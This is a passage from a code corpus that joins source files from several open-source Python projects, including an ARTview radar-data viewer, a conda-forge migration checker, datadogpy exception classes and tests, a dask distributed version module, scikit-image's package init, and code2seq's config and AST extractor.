'spec_at_field': [None if a == "" else a for a in (
str(self.specAtField.text()),)][0],
'corr_refl_field': [None if a == "" else a for a in (
str(self.corrReflField.text()),)][0],
}
print(args)
# execute
print("Correcting ..")
t0 = time.time()
try:
spec_at, cor_z = pyart.correct.calculate_attenuation(**args)
except:
import traceback
error = traceback.format_exc()
common.ShowLongText("Py-ART fails with following error\n\n" +
error)
t1 = time.time()
print(("Correction took %fs" % (t1-t0)))
# verify field overwriting
if args['spec_at_field'] is None:
spec_at_field_name = "specific_attenuation"
else:
spec_at_field_name = args['spec_at_field']
if args['corr_refl_field'] is None:
corr_refl_field_name = "corrected_reflectivity"
else:
corr_refl_field_name = args['corr_refl_field']
strong_update = False # insertion is weak, overwrite strong
if spec_at_field_name in self.Vradar.value.fields.keys():
resp = common.ShowQuestion(
"Field %s already exists! Do you want to over write it?" %
spec_at_field_name)
if resp != QtGui.QMessageBox.Ok:
return
else:
strong_update = True
if corr_refl_field_name in self.Vradar.value.fields.keys():
resp = common.ShowQuestion(
"Field %s already exists! Do you want to over write it?" %
corr_refl_field_name)
if resp != QtGui.QMessageBox.Ok:
return
else:
strong_update = True
# add fields and update
self.Vradar.value.add_field(spec_at_field_name, spec_at, True)
self.Vradar.value.add_field(corr_refl_field_name, cor_z, True)
self.Vradar.update(strong_update)
print("Correction took %fs" % (t1-t0))
def _clearLayout(self, layout):
'''recursively remove items from layout.'''
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self._clearLayout(item.layout())
_plugins = [CalculateAttenuation]
```
#### File: artview/plugins/io.py
```python
import code
import pyart
import sys
import os
path = os.path.dirname(sys.modules[__name__].__file__)
path = os.path.join(path, '...')
sys.path.insert(0, path)
import artview
from ..core import Component, Variable, common, QtGui, QtCore, componentsList
# get list of read functions
import inspect
aux_read_functions = inspect.getmembers(pyart.aux_io, inspect.isfunction)
read_functions = [
pyart.io.read,
pyart.io.read_grid,
pyart.io.read_grid_mdv] + [a[1] for a in aux_read_functions]
try:
read_functions.append(pyart.io.read_legacy_grid)
except:
pass
# test for missing dependency
brocken_read_functions = []
try:
for func in read_functions:
try:
func(None)
except pyart.exceptions.MissingOptionalDependency:
brocken_read_functions.append(func)
except:
pass
except:
pass
class FileList(Component):
'''
Open an interactive python console so the direct manipulation
'''
Vradar = None #: see :ref:`shared_variable`
Vgrid = None #: see :ref:`shared_variable`
@classmethod
def guiStart(self, parent=None):
'''Graphical interface for starting this class.'''
kwargs, independent = \
common._SimplePluginStart("FileList").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
return self(), False
def __init__(self, dirIn=None, name="FileList", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
dirIn: string
Initial directory path to open.
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
'''
super(FileList, self).__init__(name=name, parent=parent)
self.listView = QtGui.QListView()
# set up listView
model = QtGui.QFileSystemModel()
model.setFilter(QtCore.QDir.AllEntries |
QtCore.QDir.AllDirs |
QtCore.QDir.NoDot)
model.setRootPath(QtCore.QDir.currentPath())
self.listView.setModel(model)
if dirIn is None: # avoid reference to path while building doc
dirIn = os.getcwd()
index = model.index(dirIn)
self.listView.setRootIndex(index)
# self.clicked.connect(self.test)
self.listView.doubleClicked.connect(self.doubleClick)
# context (right-click) menu
self.listView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# setup widget
self.setCentralWidget(self.listView)
self.listView.customContextMenuRequested.connect(self.contextMenu)
self.Vradar = Variable(None)
self.Vgrid = Variable(None)
self.sharedVariables = {"Vradar": None,
"Vgrid": None}
self.connectAllVariables()
self.show()
def doubleClick(self, index):
'''Open Directory or File on double click.'''
model = self.listView.model()
indexItem = model.index(index.row(), 0, index.parent())
if model.fileName(indexItem) == '..':
if index.parent().parent().isValid():
self.listView.setRootIndex(index.parent().parent())
elif model.isDir(index):
self.listView.setRootIndex(index)
else:
self.open(model.filePath(indexItem))
def open(self, path):
'''Open file.'''
# try several open
print ("open: %s" % path)
self.filename = str(path)
try:
radar = pyart.io.read(self.filename, delay_field_loading=True)
# Add the filename for Display
radar.filename = self.filename
self.Vradar.change(radar)
return
except:
try:
radar = pyart.io.read(self.filename)
# Add the filename for Display
radar.filename = self.filename
self.Vradar.change(radar)
return
except:
import traceback
print(traceback.format_exc())
radar_warning = True
try:
grid = pyart.io.read_grid(
self.filename, delay_field_loading=True)
self.Vgrid.change(grid)
return
except:
try:
grid = pyart.io.read_grid(self.filename)
self.Vgrid.change(grid)
return
except:
import traceback
print(traceback.format_exc())
grid_warning = True
if grid_warning or radar_warning:
msg = "Py-ART didn't recognize this file!"
common.ShowWarning(msg)
else:
msg = "Could not open file, invalid mode!"
common.ShowWarning(msg)
return
def contextMenu(self, pos):
'''Contruct right-click menu.'''
menu = QtGui.QMenu(self)
index = self.listView.currentIndex()
path = str(self.listView.model().filePath(index))
for func in read_functions:
action = QtGui.QAction("Open with: %s" % func.__name__, self)
# lambda inside loop: problem with variable capturing
if func not in brocken_read_functions:
f = lambda boo, func=func: self.open_with(func, path)
action.triggered.connect(f)
else:
action.setEnabled(False)
menu.addAction(action)
menu.exec_(self.listView.mapToGlobal(pos))
def open_with(self, func, path):
'''Open file using a given function.'''
try:
container = func(path, delay_field_loading=True)
if isinstance(container, pyart.core.Radar):
self.Vradar.change(container)
elif isinstance(container, pyart.core.Grid):
self.Vgrid.change(container)
else:
raise NotImplementedError("Unknown container type %s\n" %
container)
return
except:
import traceback
error = traceback.format_exc()
common.ShowLongText(("Opening file %s with %s fails\n\n" %
(path, func.__name__)) + error)
traceback.format_exc()
_plugins = [FileList]
```
#### File: artview/scripts/_common.py
```python
import pyart
from ..components import (Menu, RadarDisplay, GridDisplay, LinkPlugins,
SelectRegion, PointsDisplay)
from ..core import QtGui, QtCore
def _add_all_advanced_tools(menu):
# add grafical starts
for comp in [LinkPlugins, RadarDisplay, GridDisplay, SelectRegion]:
action = QtGui.QAction(comp.__name__, menu)
action.triggered[()].connect(
lambda comp=comp: menu.startComponent(comp))
menu.addMenuAction(("Advanced Tools",), action)
# add all plugins to grafical start
try:
from .. import plugins
for plugin in plugins._plugins.values():
action = QtGui.QAction(plugin.__name__, menu)
action.triggered[()].connect(
lambda plugin=plugin: menu.startComponent(plugin))
menu.addMenuAction(("Advanced Tools",), action)
except:
import traceback
print(traceback.format_exc())
import warnings
warnings.warn("Loading Plugins Fail")
def _parse_dir(DirIn):
if DirIn is None: # avoid reference to path while building documentation
DirIn = os.getcwd()
return DirIn
Zlike = ['CZ', 'DZ', 'AZ', 'Z',
'dbz', 'DBZ', 'dBZ', 'DBZ_S', 'DBZ_K',
'reflectivity_horizontal', 'DBZH', 'corr_reflectivity']
def _parse_field(container, field):
'''
Hack to perform a check on reflectivity to make it work with
a larger number of files as there are many nomenclature is the
weather radar world.
This should only occur upon start up with a new file.
'''
if field is None:
field = pyart.config.get_field_name('reflectivity')
if container is None:
return field
fieldnames = container.fields.keys()
Zinfile = set(fieldnames).intersection(Zlike)
if field not in fieldnames and len(Zinfile) > 0:
field = Zinfile.pop()
return field
def startMainMenu(DirIn=None, filename=None):
MainMenu = Menu(DirIn, filename, mode=("Radar", "Grid"))
for comp in [LinkPlugins, RadarDisplay, GridDisplay, SelectRegion]:
action = QtGui.QAction(comp.__name__, MainMenu)
action.triggered[()].connect(
lambda comp=comp: MainMenu.startComponent(comp))
MainMenu.addMenuAction(("Advanced Tools",), action)
try:
from .. import plugins
for plugin in plugins._plugins.values():
action = QtGui.QAction(plugin.__name__, MainMenu)
action.triggered[()].connect(
lambda plugin=plugin: MainMenu.startComponent(plugin))
MainMenu.addMenuAction(("Advanced Tools",), action)
except:
import warnings
warnings.warn("Loading Plugins Fail")
try:
from ..modes import modes
for mode in modes.keys():
action = QtGui.QAction(mode, MainMenu)
action.triggered[()].connect(
lambda mode=mode: MainMenu.change_mode(modes[mode]))
if mode != 'file_list':
MainMenu.addMenuAction(("Modes",), action)
else:
MainMenu.addMenuAction(("File",), action)
except:
import warnings
warnings.warn("Loading Modes Fail")
return MainMenu
# resize menu
menu_width = 300
menu_height = 180
MainMenu.setGeometry(0, 0, menu_width, menu_height)
```
#### File: artview/scripts/_parse_field.py
```python
import pyart
Zlike = ['CZ', 'DZ', 'AZ', 'Z',
'dbz', 'DBZ', 'dBZ', 'DBZ_S', 'DBZ_K',
'reflectivity_horizontal', 'DBZH', 'corr_reflectivity']
def _parse_field(container, field):
'''
Hack to perform a check on reflectivity to make it work with
a larger number of files as there are many nomenclature is the
weather radar world.
This should only occur upon start up with a new file.
'''
if container is None:
return field
fieldnames = container.fields.keys()
Zinfile = set(fieldnames).intersection(Zlike)
if field == pyart.config.get_field_name('reflectivity'):
if field not in fieldnames and len(Zinfile) > 0:
field = Zinfile.pop()
return field
```
#### File: artview/artview/view.py
```python
import os
import pyart
from .core import Variable, QtGui, QtCore
from .components import (
RadarDisplay, GridDisplay, Menu, LinkPlugins, SelectRegion)
from .scripts._common import startMainMenu
app = None
displays = []
MainMenu = None
reflectivity = pyart.config.get_field_name('reflectivity')
def view(containers, field=reflectivity):
'''
Launch ARTview from shell.
Parameters
----------
container : list of :py:class:`~pyart.core.Radar` or \
:py:class:`~pyart.core.Grid` objects
Object to visualise.
field : str
Field to start visualization with.
'''
# test if containers isn't itetable
if not hasattr(containers, '__contains__'):
containers = (containers,)
start()
for container in containers:
if isinstance(container, pyart.core.Radar):
addRadar(container, field)
elif isinstance(container, pyart.core.Grid):
addGrid(container, field)
else:
import warnings
warnings.warn('Ignoring unknown container %s' % container)
execute()
def start():
''' Start Qt Application and :py:class:`~artview.components.Menu` '''
global app
if app is None:
app = QtGui.QApplication([])
global MainMenu
MainMenu = startMainMenu(os.getcwd(), False)
# resize menu
menu_width = 300
menu_height = 180
MainMenu.setGeometry(0, 0, menu_width, menu_height)
def execute():
''' Execute Application '''
global app
app.exec_()
def close():
''' Delet all references to allow Garbage Colletion. '''
global displays
displays = []
global MainMenu
MainMenu = None
global app
app = None
def addRadar(radar, field=reflectivity):
'''
add :py:class:`~artview.components.RadarDisplay` to Artview Application.
Parameters
----------
radar : :py:class:`~pyart.core.Radar` object
Object to add to visualisation
field : str
Field to start visualization with
'''
i = len(displays)
displays.append(RadarDisplay(
Variable(radar), Variable(field), Variable(0), name="Display%i" % i,
parent=MainMenu))
def addGrid(grid, field=reflectivity):
'''
add :py:class:`~artview.components.GridDisplay` to Artview Application.
Parameters
----------
grid : :py:class:`~pyart.core.Grid` object
Object to add to visualisation
field : str
Field to start visualization with
'''
i = len(displays)
displays.append(GridDisplay(
Variable(grid), Variable(field), Variable(0), name="Display%i" % i,
parent=MainMenu))
``` |
{
"source": "jjhelmus/conda4aarch64",
"score": 3
} |
#### File: conda4aarch64/tools/check_cf_migration.py
```python
import argparse
import bz2
import json
import os.path
import urllib.request
URL_TEMPLATE = ('https://conda.anaconda.org/{channel}/label/main/'
'{subdir}/repodata.json.bz2')
def repodata_filename(channel, subdir):
fname = f'{channel}_{subdir}_repodata.json.bz2'
return os.path.join('cache', fname)
def get_repodata(channel, subdir):
filename = repodata_filename(channel, subdir)
url = URL_TEMPLATE.format(channel=channel, subdir=subdir)
print("Saving:", filename)
urllib.request.urlretrieve(url, filename=filename)
return
def parse_repodata(channel, subdir):
filename = repodata_filename(channel, subdir)
with bz2.BZ2File(filename, 'r') as bfile:
repodata = json.loads(bfile.read())
packages = repodata['packages']
names = set(pkg['name'] for pkg in packages.values())
return names
def parse_arguments():
parser = argparse.ArgumentParser(
description="List packages not yet migrated to conda-forge")
parser.add_argument(
'--use_cache', action='store_true', help='used cached repodata')
return parser.parse_args()
def main():
args = parse_arguments()
if not args.use_cache:
get_repodata('c4aarch64', 'linux-aarch64')
get_repodata('c4aarch64', 'noarch')
get_repodata('conda-forge', 'linux-aarch64')
get_repodata('conda-forge', 'noarch')
c4_linux = parse_repodata('c4aarch64', 'linux-aarch64')
c4_noarch = parse_repodata('c4aarch64', 'noarch')
cf_linux = parse_repodata('conda-forge', 'linux-aarch64')
cf_noarch = parse_repodata('conda-forge', 'noarch')
c4_all = c4_linux | c4_noarch
cf_all = cf_linux | cf_noarch
missing = c4_all - cf_all
print("Packages in c4aarch but not conda-forge")
print("---------------------------------------")
for name in sorted(missing):
print(name)
if __name__ == "__main__":
main()
``` |
{
"source": "jjhelmus/datadogpy",
"score": 3
} |
#### File: datadog/api/exceptions.py
```python
class DatadogException(Exception):
"""
Base class for Datadog API exceptions. Use this for patterns like the following:
try:
# do something with the Datadog API
except datadog.api.exceptions.DatadogException:
# handle any Datadog-specific exceptions
"""
class ProxyError(DatadogException):
"""
HTTP connection to the configured proxy server failed.
"""
def __init__(self, method, url, exception):
message = u"Could not request {method} {url}: Unable to connect to proxy. "\
u"Please check the proxy configuration and try again.".format(
method=method, url=url
)
super(ProxyError, self).__init__(message)
class ClientError(DatadogException):
"""
HTTP connection to Datadog endpoint is not possible.
"""
def __init__(self, method, url, exception):
message = u"Could not request {method} {url}: {exception}. "\
u"Please check the network connection or try again later. "\
u"If the problem persists, please contact <EMAIL>".format(
method=method, url=url, exception=exception
)
super(ClientError, self).__init__(message)
class HttpTimeout(DatadogException):
"""
HTTP connection timeout.
"""
def __init__(self, method, url, timeout):
message = u"{method} {url} timed out after {timeout}. "\
u"Please try again later. "\
u"If the problem persists, please contact <EMAIL>".format(
method=method, url=url, timeout=timeout
)
super(HttpTimeout, self).__init__(message)
class HttpBackoff(DatadogException):
"""
Backing off after too many timeouts.
"""
def __init__(self, backoff_period):
message = u"Too many timeouts. Won't try again for {backoff_period} seconds. ".format(
backoff_period=backoff_period)
super(HttpBackoff, self).__init__(message)
class HTTPError(DatadogException):
"""
Datadog returned a HTTP error.
"""
def __init__(self, status_code=None, reason=None):
reason = u" - {reason}".format(reason=reason) if reason else u""
message = u"Datadog returned a bad HTTP response code: {status_code}{reason}. "\
u"Please try again later. "\
u"If the problem persists, please contact <EMAIL>".format(
status_code=status_code,
reason=reason,
)
super(HTTPError, self).__init__(message)
class ApiError(DatadogException):
"""
Datadog returned an API error (known HTTPError).
Matches the following status codes: 400, 401, 403, 404, 409, 429.
"""
class ApiNotInitialized(DatadogException):
"No API key is set"
```
#### File: integration/api/test_aws_logs.py
```python
from datadog import api as dog
from datadog import initialize
from tests.integration.api.constants import API_KEY, APP_KEY, API_HOST
TEST_ACCOUNT_ID = "123456789101"
TEST_ROLE_NAME = "DatadogApiTestRole"
TEST_LAMBDA_ARN = "arn:aws:lambda:us-east-1:123456789101:function:APITest"
AVAILABLE_SERVICES = 6
class TestAwsLogsIntegration:
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class.
"""
initialize(api_key=API_KEY, app_key=APP_KEY, api_host=API_HOST)
dog.AwsIntegration.create(
account_id=TEST_ACCOUNT_ID,
role_name=TEST_ROLE_NAME
)
@classmethod
def teardown_class(cls):
""" teardown any state that was previously setup with a setup_method
call.
"""
dog.AwsIntegration.delete(account_id=TEST_ACCOUNT_ID, role_name=TEST_ROLE_NAME)
def test_list_log_services(self):
output = dog.AwsLogsIntegration.list_log_services()
assert len(output) >= AVAILABLE_SERVICES
def test_aws_logs_crud(self):
add_lambda_arn_output = dog.AwsLogsIntegration.add_log_lambda_arn(
account_id=TEST_ACCOUNT_ID,
lambda_arn=TEST_LAMBDA_ARN
)
assert add_lambda_arn_output == {}
save_services_output = dog.AwsLogsIntegration.save_services(
account_id=TEST_ACCOUNT_ID,
services=["s3", "elb", "elbv2", "cloudfront", "redshift", "lambda"]
)
assert save_services_output == {}
list_output = dog.AwsLogsIntegration.list()
expected_fields = [
'services',
'lambdas',
'account_id'
]
assert all(k in list_output[0].keys() for k in expected_fields)
delete_output = dog.AwsLogsIntegration.delete_config(
account_id=TEST_ACCOUNT_ID,
lambda_arn=TEST_LAMBDA_ARN
)
assert delete_output == {}
def test_check_lambda(self):
output = dog.AwsLogsIntegration.check_lambda(
account_id=TEST_ACCOUNT_ID,
lambda_arn=TEST_LAMBDA_ARN
)
assert 'status' in output.keys()
def test_check_services(self):
output = dog.AwsLogsIntegration.check_services(
account_id=TEST_ACCOUNT_ID,
services=["s3", "elb", "elbv2", "cloudfront", "redshift", "lambda"]
)
assert 'status' in output.keys()
``` |
{
"source": "jjhelmus/distributed",
"score": 2
} |
#### File: distributed/distributed/versions.py
```python
from __future__ import print_function, division, absolute_import
from collections import defaultdict
import platform
import struct
import os
import sys
import importlib
required_packages = [
("dask", lambda p: p.__version__),
("distributed", lambda p: p.__version__),
("msgpack", lambda p: ".".join([str(v) for v in p.version])),
("cloudpickle", lambda p: p.__version__),
("tornado", lambda p: p.version),
("toolz", lambda p: p.__version__),
]
optional_packages = [
("numpy", lambda p: p.__version__),
("lz4", lambda p: p.__version__),
("blosc", lambda p: p.__version__),
]
# only these scheduler packages will be checked for version mismatch
scheduler_relevant_packages = set(pkg for pkg, _ in required_packages) | set(
["lz4", "blosc"]
)
def get_versions(packages=None):
"""
Return basic information on our software installation, and our installed versions of packages.
"""
if packages is None:
packages = []
d = {
"host": get_system_info(),
"packages": get_package_info(
required_packages + optional_packages + list(packages)
),
}
return d
def get_system_info():
(sysname, nodename, release, version, machine, processor) = platform.uname()
host = {
"python": "%d.%d.%d.%s.%s" % sys.version_info[:],
"python-bits": struct.calcsize("P") * 8,
"OS": "%s" % sysname,
"OS-release": "%s" % release,
"machine": "%s" % machine,
"processor": "%s" % processor,
"byteorder": "%s" % sys.byteorder,
"LC_ALL": "%s" % os.environ.get("LC_ALL", "None"),
"LANG": "%s" % os.environ.get("LANG", "None"),
}
return host
def version_of_package(pkg):
""" Try a variety of common ways to get the version of a package """
from .utils import ignoring
with ignoring(AttributeError):
return pkg.__version__
with ignoring(AttributeError):
return str(pkg.version)
with ignoring(AttributeError):
return ".".join(map(str, pkg.version_info))
return None
def get_package_info(pkgs):
""" get package versions for the passed required & optional packages """
pversions = []
for pkg in pkgs:
if isinstance(pkg, (tuple, list)):
modname, ver_f = pkg
else:
modname = pkg
ver_f = version_of_package
if ver_f is None:
ver_f = version_of_package
try:
mod = importlib.import_module(modname)
ver = ver_f(mod)
pversions.append((modname, ver))
except Exception:
pversions.append((modname, None))
return dict(pversions)
def error_message(scheduler, workers, client, client_name="client"):
from .utils import asciitable
nodes = {**{client_name: client}, **{"scheduler": scheduler}, **workers}
# Hold all versions, e.g. versions["scheduler"]["distributed"] = 2.9.3
node_packages = defaultdict(dict)
# Collect all package versions
packages = set()
for node, info in nodes.items():
if info is None or not (isinstance(info, dict)) or "packages" not in info:
node_packages[node] = defaultdict(lambda: "UNKNOWN")
else:
node_packages[node] = defaultdict(lambda: "MISSING")
for pkg, version in info["packages"].items():
node_packages[node][pkg] = version
packages.add(pkg)
# Collect Python version for each node
node_packages[node]["python"] = info["host"]["python"]
packages.add("python")
errs = []
for pkg in sorted(packages):
versions = set(
node_packages[node][pkg]
for node in nodes
if node != "scheduler" or pkg in scheduler_relevant_packages
)
if len(versions) <= 1:
continue
rows = [
(node_name, node_packages[node_name][pkg]) for node_name in nodes.keys()
]
errs.append("%s\n%s" % (pkg, asciitable(["", "version"], rows)))
if errs:
return "Mismatched versions found\n" "\n" "%s" % ("\n\n".join(errs))
else:
return ""
class VersionMismatchWarning(Warning):
"""Indicates version mismatch between nodes"""
``` |
{
"source": "jjhelmus/leastsqbound-scipy",
"score": 3
} |
#### File: jjhelmus/leastsqbound-scipy/test_linear.py
```python
import numpy as np
from scipy.optimize import leastsq
from leastsqbound import leastsqbound
def func(p, x):
"""model data as y = m*x+b """
m, b = p
return m * np.array(x) + b
def err(p, y, x):
return y - func(p, x)
# extract data
temp = np.genfromtxt("sample_data.dat")
x = temp[:, 0]
y = temp[:, 1]
# perform unbounded least squares fitting
p0 = [1.0, 0.0]
p, cov_x, infodic, mesg, ier = leastsq(err, p0, args=(y, x), full_output=True)
# print out results
print "Standard Least Squares fitting results:"
print "p:", p
print "cov_x:", cov_x
print "infodic['nfev']:", infodic['nfev']
print "infodic['fvec']:", infodic['fvec']
print "infodic['fjac']:", infodic['fjac']
print "infodic['ipvt']:", infodic['ipvt']
print "infodic['qtf']:", infodic['qtf']
print "mesg:", mesg
print "ier:", ier
print ""
# same as above using no bounds
p0 = [1.0, 0.0]
p, cov_x, infodic, mesg, ier = leastsqbound(err, p0, args=(y, x),
full_output=True)
# print out results
print "Bounded Least Squares fitting with no bounds results:"
print "p:", p
print "cov_x:", cov_x
print "infodic['nfev']:", infodic['nfev']
print "infodic['fvec']:", infodic['fvec']
print "infodic['fjac']:", infodic['fjac']
print "infodic['ipvt']:", infodic['ipvt']
print "infodic['qtf']:", infodic['qtf']
print "mesg:", mesg
print "ier:", ier
print ""
# perform bounded least squares fitting
p0 = [1.0, 0.0]
bounds = [(0.0, 2.0), (-10.0, 10.0)]
p, cov_x, infodic, mesg, ier = leastsqbound(err, p0, args=(y, x),
bounds = bounds, full_output=True)
# print out results
print "Bounded Least Squares fitting results:"
print "p:", p
print "cov_x:", cov_x
print "infodic['nfev']:", infodic['nfev']
print "infodic['fvec']:", infodic['fvec']
print "infodic['fjac']:", infodic['fjac']
print "infodic['ipvt']:", infodic['ipvt']
print "infodic['qtf']:", infodic['qtf']
print "mesg:", mesg
print "ier:", ier
``` |
{
"source": "jjhelmus/scikit-image",
"score": 2
} |
#### File: scikit-image/skimage/__init__.py
```python
import os.path as osp
import imp
import functools
import warnings
import sys
pkg_dir = osp.abspath(osp.dirname(__file__))
data_dir = osp.join(pkg_dir, 'data')
__version__ = '0.13dev'
try:
imp.find_module('nose')
except ImportError:
def _test(doctest=False, verbose=False):
"""This would run all unit tests, but nose couldn't be
imported so the test suite can not run.
"""
raise ImportError("Could not load nose. Unit tests not available.")
else:
def _test(doctest=False, verbose=False):
"""Run all unit tests."""
import nose
args = ['', pkg_dir, '--exe', '--ignore-files=^_test']
if verbose:
args.extend(['-v', '-s'])
if doctest:
args.extend(['--with-doctest', '--ignore-files=^\.',
'--ignore-files=^setup\.py$$', '--ignore-files=test'])
# Make sure warnings do not break the doc tests
with warnings.catch_warnings():
warnings.simplefilter("ignore")
success = nose.run('skimage', argv=args)
else:
success = nose.run('skimage', argv=args)
# Return sys.exit code
if success:
return 0
else:
return 1
# do not use `test` as function name as this leads to a recursion problem with
# the nose test suite
test = _test
test_verbose = functools.partial(test, verbose=True)
test_verbose.__doc__ = test.__doc__
doctest = functools.partial(test, doctest=True)
doctest.__doc__ = doctest.__doc__
doctest_verbose = functools.partial(test, doctest=True, verbose=True)
doctest_verbose.__doc__ = doctest.__doc__
# Logic for checking for improper install and importing while in the source
# tree when package has not been installed inplace.
# Code adapted from scikit-learn's __check_build module.
_INPLACE_MSG = """
It appears that you are importing a local scikit-image source tree. For
this, you need to have an inplace install. Maybe you are in the source
directory and you need to try from another location."""
_STANDARD_MSG = """
Your install of scikit-image appears to be broken.
Try re-installing the package following the instructions at:
http://scikit-image.org/docs/stable/install.html """
def _raise_build_error(e):
# Raise a comprehensible error
local_dir = osp.split(__file__)[0]
msg = _STANDARD_MSG
if local_dir == "skimage":
# Picking up the local install: this will work only if the
# install is an 'inplace build'
msg = _INPLACE_MSG
raise ImportError("""%s
It seems that scikit-image has not been built correctly.
%s""" % (e, msg))
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages of skimage when
# the binaries are not built
__SKIMAGE_SETUP__
except NameError:
__SKIMAGE_SETUP__ = False
if __SKIMAGE_SETUP__:
sys.stderr.write('Partial import of skimage during the build process.\n')
# We are not importing the rest of the scikit during the build
# process, as it may not be compiled yet
else:
try:
from ._shared import geometry
del geometry
except ImportError as e:
_raise_build_error(e)
from .util.dtype import *
if sys.version.startswith('2.6'):
msg = ("Python 2.6 is deprecated and will not be supported in "
"scikit-image 0.13+")
warnings.warn(msg, stacklevel=2)
del warnings, functools, osp, imp, sys
``` |
{
"source": "jjhenkel/code2seq",
"score": 2
} |
#### File: jjhenkel/code2seq/config.py
```python
class Config:
@staticmethod
def get_default_config(args):
config = Config(args)
config.NUM_EPOCHS = 3000
config.SAVE_EVERY_EPOCHS = 1
config.PATIENCE = 10
config.BATCH_SIZE = args.batch_size if args.batch_size is not None else 512
config.TEST_BATCH_SIZE = 256
config.READER_NUM_PARALLEL_BATCHES = 1
config.SHUFFLE_BUFFER_SIZE = 10000
config.CSV_BUFFER_SIZE = 100 * 1024 * 1024 # 100 MB
config.MAX_CONTEXTS = 200
config.SUBTOKENS_VOCAB_MAX_SIZE = 190000
config.TARGET_VOCAB_MAX_SIZE = 27000
config.EMBEDDINGS_SIZE = 128
config.RNN_SIZE = 128 * 2 # Two LSTMs to embed paths, each of size 128
config.DECODER_SIZE = 320
config.NUM_DECODER_LAYERS = 1
config.MAX_PATH_LENGTH = 8 + 1
config.MAX_NAME_PARTS = 5
config.MAX_TARGET_PARTS = 6
config.EMBEDDINGS_DROPOUT_KEEP_PROB = 0.75
config.RNN_DROPOUT_KEEP_PROB = 0.5
config.BIRNN = True
config.RANDOM_CONTEXTS = True
config.BEAM_WIDTH = 0
config.USE_MOMENTUM = True
return config
def take_model_hyperparams_from(self, otherConfig):
self.EMBEDDINGS_SIZE = otherConfig.EMBEDDINGS_SIZE
self.RNN_SIZE = otherConfig.RNN_SIZE
self.DECODER_SIZE = otherConfig.DECODER_SIZE
self.NUM_DECODER_LAYERS = otherConfig.NUM_DECODER_LAYERS
self.BIRNN = otherConfig.BIRNN
if self.DATA_NUM_CONTEXTS <= 0:
self.DATA_NUM_CONTEXTS = otherConfig.DATA_NUM_CONTEXTS
def __init__(self, args):
self.NUM_EPOCHS = 0
self.SAVE_EVERY_EPOCHS = 0
self.PATIENCE = 0
self.BATCH_SIZE = 0
self.TEST_BATCH_SIZE = 0
self.READER_NUM_PARALLEL_BATCHES = 0
self.SHUFFLE_BUFFER_SIZE = 0
self.CSV_BUFFER_SIZE = None
self.TRAIN_PATH = args.data_path
self.TEST_PATH = args.test_path if args.test_path is not None else ''
self.DATA_NUM_CONTEXTS = 0
self.MAX_CONTEXTS = 0
self.SUBTOKENS_VOCAB_MAX_SIZE = 0
self.TARGET_VOCAB_MAX_SIZE = 0
self.EMBEDDINGS_SIZE = 0
self.RNN_SIZE = 0
self.DECODER_SIZE = 0
self.NUM_DECODER_LAYERS = 0
self.SAVE_PATH = args.save_path_prefix
self.LOAD_PATH = args.load_path
self.MAX_PATH_LENGTH = 0
self.MAX_NAME_PARTS = 0
self.MAX_TARGET_PARTS = 0
self.EMBEDDINGS_DROPOUT_KEEP_PROB = 0
self.RNN_DROPOUT_KEEP_PROB = 0
self.BIRNN = False
self.RANDOM_CONTEXTS = True
self.BEAM_WIDTH = 1
self.USE_MOMENTUM = True
self.RELEASE = args.release
@staticmethod
def get_debug_config(args):
config = Config(args)
config.NUM_EPOCHS = 3000
config.SAVE_EVERY_EPOCHS = 100
config.PATIENCE = 200
config.BATCH_SIZE = 7
config.TEST_BATCH_SIZE = 7
config.READER_NUM_PARALLEL_BATCHES = 1
config.SHUFFLE_BUFFER_SIZE = 10
config.CSV_BUFFER_SIZE = None
config.MAX_CONTEXTS = 5
config.SUBTOKENS_VOCAB_MAX_SIZE = 190000
config.TARGET_VOCAB_MAX_SIZE = 27000
config.EMBEDDINGS_SIZE = 19
config.RNN_SIZE = 10
config.DECODER_SIZE = 11
config.NUM_DECODER_LAYERS = 1
config.MAX_PATH_LENGTH = 8 + 1
config.MAX_NAME_PARTS = 5
config.MAX_TARGET_PARTS = 6
config.EMBEDDINGS_DROPOUT_KEEP_PROB = 1
config.RNN_DROPOUT_KEEP_PROB = 1
config.BIRNN = True
config.RANDOM_CONTEXTS = True
config.BEAM_WIDTH = 0
config.USE_MOMENTUM = False
return config
```
#### File: code2seq/Python150kExtractor/extract.py
```python
import argparse
import re
import os
import json
import multiprocessing
import itertools
import tqdm
import numpy as np
from pathlib import Path
from sklearn import model_selection as sklearn_model_selection
METHOD_NAME, NUM = 'METHODNAME', 'NUM'
RT_REGEX = re.compile('\'?"?REPLACEME\d+"?\'?')
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', required=True, type=str)
parser.add_argument('--max_path_length', type=int, default=8)
parser.add_argument('--max_path_width', type=int, default=2)
parser.add_argument('--use_method_name', type=bool, default=True)
parser.add_argument('--use_nums', type=bool, default=True)
parser.add_argument('--output_dir', required=True, type=str)
parser.add_argument('--n_jobs', type=int, default=multiprocessing.cpu_count())
parser.add_argument('--seed', type=int, default=239)
def __collect_asts(json_file):
return list(filter(
None,
[ x.strip() for x in open(json_file, 'r', encoding='utf-8').readlines() ]
))
def __maybe_rt(value):
if RT_REGEX.match(value):
return "@R_" + value.strip().replace("REPLACEME", "").replace("'", '').replace('"', '') + "@"
return value
def __maybe_rt_str(value):
if RT_REGEX.match(value):
return "@R_" + value.strip().replace("REPLACEME", "").replace("'", '').replace('"', '') + "@"
value = re.sub(
"[^A-Za-z0-9|]", "",
re.sub(
r'["\',]', "",
re.sub(
r'\s+', '|', value.lower().replace('\\\\n', '')
)
)
).strip('|')
return value
def __terminals(ast, node_index, args):
stack, paths = [], []
def dfs(v):
# Skip DEF node
if v == node_index + 1:
return
stack.append(v)
v_node = ast[v]
if 'value' in v_node:
if v == node_index + 2: # Top-level func def node.
if args.use_method_name:
paths.append((stack.copy(), METHOD_NAME))
else:
v_type = v_node['type']
if v_type == "NAME":
paths.append((stack.copy(), __maybe_rt(v_node['value'])))
elif args.use_nums and v_type == 'NUMBER':
paths.append((stack.copy(), NUM))
elif v_type == 'STRING':
paths.append((stack.copy(), __maybe_rt_str(v_node['value'][:50])))
else:
pass
if 'children' in v_node:
for child in v_node['children']:
